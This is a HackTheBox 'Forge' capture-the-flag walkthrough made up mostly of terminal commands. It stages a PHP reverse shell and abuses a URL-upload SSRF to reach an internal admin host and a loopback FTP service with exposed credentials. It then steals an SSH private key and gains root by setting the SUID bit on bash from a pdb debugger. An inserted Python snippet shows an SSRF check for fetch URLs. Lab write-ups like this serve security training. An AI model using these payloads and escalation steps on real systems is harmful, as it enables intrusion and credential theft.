HackTheBox – Forge Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.111
┌──(rootkali)-[/home/kali/Downloads]
└─# cp /usr/share/laudanum/php/php-reverse-shell.php test1.php
http://forge.htb/uploads/Fn1T9NPtQKBZ9yeDNhQ1
┌──(rootkali)-[/home/kali/Downloads]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/zpEV4OW89xN8btm6wm0F
I got a folder named "announcements". Let's append this again in the URL upload; your upload URL would then look like: http://ADMIN.FORGE.HTB/announcements
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/6y4WUK66VfUqa3jsGg5C
I got some useful info, including FTP creds and the scripting method to upload img.
I tried the method to access FTP and its folder by again submitting a URL through the URL upload method. Below is the link I used to upload:
http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/ApWCvb75cjvtTFI37syO
http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.1.1.1/.ssh/id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://forge.htb/uploads/jJYhT1sBxieg2C7RCOxb
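The URL-upload requests above make the server fetch an internal virtual host and a loopback FTP service. As an added example (not code from the box or from this walkthrough), here is a server-side check that would refuse those URLs; `check_fetch_url`, `sample_resolver` and the name table are hypothetical, and the table assumes the admin vhost resolves to loopback.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # the ftp:// URLs above are refused outright


def system_resolver(host):
    """All addresses a name resolves to; IP literals resolve without a lookup."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_fetch_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a URL the server is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "embedded credentials not allowed"
    host = parts.hostname  # already lowercased: ADMIN.FORGE.HTB -> admin.forge.htb
    if not host:
        return False, "missing host"
    try:
        ips = [ipaddress.ip_address(a) for a in resolver(host)]
    except (OSError, ValueError):
        ips = []
    if not ips:
        return False, "host does not resolve"
    # is_global is False for all of 127.0.0.0/8, RFC 1918, link-local, etc.
    bad = [ip for ip in ips if not ip.is_global]
    if bad:
        return False, f"{host} resolves to non-public address {bad[0]}"
    return True, "ok"


# Constructed name table for the demo; assumes the admin vhost sits on loopback.
SAMPLE_DNS = {"admin.forge.htb": {"127.0.0.1"}, "example.com": {"93.184.216.34"}}


def sample_resolver(host):
    return SAMPLE_DNS.get(host) or system_resolver(host)


if __name__ == "__main__":
    for u in ("http://ADMIN.FORGE.HTB/announcements", "http://127.0.1.1/",
              "ftp://user:pw@127.1.1.1/.ssh/id_rsa", "http://example.com/a.png"):
        print(u, "->", check_fetch_url(u, sample_resolver))
```

The fetcher has to connect to the address that was validated and repeat the check on every redirect hop; otherwise a name that re-resolves, or a 3xx response, sidesteps it.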
┌──(rootkali)-[/home/kali/Downloads]
└─# chmod 600 id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa user@10.10.11.111
user@forge:~$ id
user@forge:~$ cd /home
user@forge:/home$ ls -lrt
user@forge:/home$ cd user
user@forge:~$ cat user.txt
user@forge:~$ sudo -l
user@forge:~$ cat /opt/remote-manage.py
Open another session
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa user@10.10.11.111
user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py
Open another terminal, connect over SSH, and try connecting to that port using nc. If you've done it correctly, you should get a selection menu. Now exceed the length so that the script enters the pdb debugger.
user@forge:~$ nc localhost 43560
password: secretadminpassword
Now you get the PDB shell.
It's time to escalate privileges. Type the commands below:
(Pdb) import os
(Pdb) os.system('chmod u+s /bin/bash')
(Pdb) exit
user@forge:~$ /bin/bash -p
bash-5.0# id
bash-5.0# cd /root
bash-5.0# cat root.txt